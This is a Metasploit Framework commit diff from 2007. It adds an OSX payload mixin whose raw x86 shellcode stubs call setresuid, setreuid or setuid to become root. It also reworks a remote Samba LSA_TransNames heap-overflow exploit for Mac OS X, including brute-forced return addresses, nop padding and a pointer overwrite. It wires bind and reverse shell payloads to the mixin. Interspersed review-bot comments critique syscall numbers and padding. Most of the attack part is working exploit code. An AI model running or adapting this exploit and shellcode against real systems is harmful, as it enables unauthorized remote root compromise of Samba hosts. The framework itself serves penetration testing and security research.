Added OSX payloads advanced options and improved Samba exploit module.

git-svn-id: file:///home/svn/framework3/trunk@5033 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Ramon de C Valle 2007-07-06 01:22:54 +00:00
parent febc0feb28
commit 99f806b0e9
8 changed files with 140 additions and 14 deletions


@ -20,6 +20,7 @@ class Payload < Msf::Module
# Platform specific includes
require 'msf/core/payload/windows'
require 'msf/core/payload/linux'
require 'msf/core/payload/osx'
##
#


@ -0,0 +1,97 @@
require 'msf/core'
###
#
# This class is here to implement advanced features for osx-based
# payloads. OSX payloads are expected to include this module if
# they want to support these features.
#
###
module Msf::Payload::Osx
#
# This mixin is chained within payloads that target the OSX platform.
# It provides special prepends, to support things like chroot and setuid.
#
def initialize(info = {})
ret = super(info)
register_advanced_options(
[
Msf::OptBool.new('PrependSetresuid',
[
false,
"Prepend a stub that executes the setresuid(0, 0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetreuid',
[
false,
"Prepend a stub that executes the setreuid(0, 0) system call",
"false"
]
),
Msf::OptBool.new('PrependSetuid',
[
false,
"Prepend a stub that executes the setuid(0) system call",
"false"
]
)
], Msf::Payload::Osx)
ret
end
#
# Overload the generate() call to prefix our stubs
#
def generate(*args)
# Call the real generator to get the payload
buf = super(*args)
pre = ''
test_arch = [ *(self.arch) ]
# Handle all x86 code here
if (test_arch.include?(ARCH_X86))
if (datastore['PrependSetresuid'])
# setresuid(0, 0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x66\xb8\x37\x01" +# movw $0x0137,%ax #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetreuid'])
# setreuid(0, 0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x7e" +# movb $0x7e,%al #
"\xcd\x80" # int $0x80 #
end
if (datastore['PrependSetuid'])
# setuid(0)
pre << "\x31\xc0" +# xorl %eax,%eax #
"\x50" +# pushl %eax #
"\x50" +# pushl %eax #
"\xb0\x17" +# movb $0x17,%al #
"\xcd\x80" # int $0x80 #
end
end
return (pre+buf)
end
end
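Review bot: The PrependSetresuid stub selects syscall 311 via `movw $0x0137,%ax`, which is the setresuid number on FreeBSD; I could not confirm from this page that Darwin/Mac OS X 10.4 implements setresuid at all, let alone at 311 (XNU's syscalls.master should be checked — I believe 311 maps to an unrelated call there), and the Samba module now turns this option on by default, so if the number is wrong the stub silently fails to become uid 0 and PrependSetreuid (0x7e) or PrependSetuid (0x17) would be the safer default. Separately, generate() only emits stubs under `if (test_arch.include?(ARCH_X86))`, yet the mixin is now included by the PPC payloads as well, so on PPC all three options are accepted and silently ignored; either add PPC stubs or state the limitation in each description, e.g. `"Prepend a stub that executes the setuid(0) system call (x86 only)"`. None of the stubs check the syscall's return value, which is reasonable for a prepend but deserves a one-line comment such as `# Return values are ignored: if the call fails the payload just runs unprivileged`. Enabling more than one option chains the stubs in the order setresuid, setreuid, setuid; that is harmless but also undocumented.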


@ -46,24 +46,24 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
'Space' => 1024,
},
'Platform' => 'osx',
'DefaultOptions' =>
{
'PrependSetresuid' => true,
},
'Targets' =>
[
['Mac OS X 10.4.x x86 Samba 3.0.10',
{
'Platform' => 'osx',
'Arch' => [ ARCH_X86 ],
'Nops' => 4 * 1024,
# This is not used in this target
'Nops' => 0,
'Bruteforce' =>
{
'Start' => { 'Ret' => 0x01813000 },
'Stop' => { 'Ret' => 0x01820000 },
'Step' => 256,
'Stop' => { 'Ret' => 0x01823000 },
'Step' => 4 * 1024,
},
'Payload' =>
{
# setresuid(0, 0, 0)
'Prepend' => "\x31\xc0\x50\x50\x50\x50\x66\xb8\x37\x01\xcd\x80",
}
}
],
@ -166,6 +166,17 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
# x86
if (target.arch.include?(ARCH_X86))
# first talloc_chunk
# 16 bits align
# 16 bits sid_name_use
# 16 bits uni_str_len
# 16 bits uni_max_len
# 32 bits buffer
# 32 bits domain_idx
# First nop block
buf = (('B' * 16) * num_entries)
#
# 0x357b ^ ( 0x1800004 ^ 0x42424242 ) = 0x43c2773d
#
@ -181,15 +192,27 @@ class Exploits::Osx::Samba::LSA_TransNames_Heap < Msf::Exploit::Remote
# a: 80 01 42 addb $0x42,(%ecx)
#
# Nop block
nops = "\x42" * (@nops.length)
# Padding nops
buf << 'B' * 2
# Jump over the pointers
buf << "\xeb\x08"
# Pointers
buf << [target_addrs['Ret']].pack('V')
buf << [size_pointer - 4].pack('V')
# padding
buf << "A" * (256 - 12)
#
# We expect to hit this nop block or the one before
# the pointers.
#
buf << 'B' * (3852 - 8 - payload.encoded.length)
# Payload
buf << payload.encoded
# These nops are truncated
nops = 'B' * (64 * 1024)
# PPC
else
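Review bot: Replacing the target's inline `'Prepend'` with `'DefaultOptions' => { 'PrependSetresuid' => true }` makes the uid-0 stub depend on the chosen payload mixing in Msf::Payload::Osx; a payload that does not (a generic or user-supplied one) now runs without it, where the old target hard-wired the bytes, so the module should either check for the option or note this in its description. The padding line `buf << 'B' * (3852 - 8 - payload.encoded.length)` raises ArgumentError on a negative count if the encoded payload, including any prepended stub, exceeds 3844 bytes; Space is 1024 so that is unreachable today, but the 3852 figure is unexplained and deserves a comment stating where it comes from and that it must stay above Space plus the prepend. With `'Step' => 4 * 1024` over 0x01813000-0x01823000 each miss corrupts the heap of an smbd child and the 64 KiB trailer from `nops = 'B' * (64 * 1024)` is sent on every attempt, which is noisy on the target; worth a sentence in the module notes. The enclosing method starts and ends outside this hunk, and I cannot see whether the PPC branch still relies on @nops after `'Nops' => 0`.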


@ -1,5 +1,5 @@
##
# $Id:$
# $Id$
##
##
@ -23,6 +23,7 @@ module Ppc
module ShellBindTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,


@ -1,5 +1,5 @@
##
# $Id:$
# $Id$
##
##
@ -23,6 +23,7 @@ module Ppc
module ShellReverseTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,


@ -23,6 +23,7 @@ module X86
module ShellBindTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,


@ -23,6 +23,7 @@ module X86
module ShellFindPort
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,


@ -23,6 +23,7 @@ module X86
module ShellReverseTcp
include Msf::Payload::Single
include Msf::Payload::Osx
def initialize(info = {})
super(merge_info(info,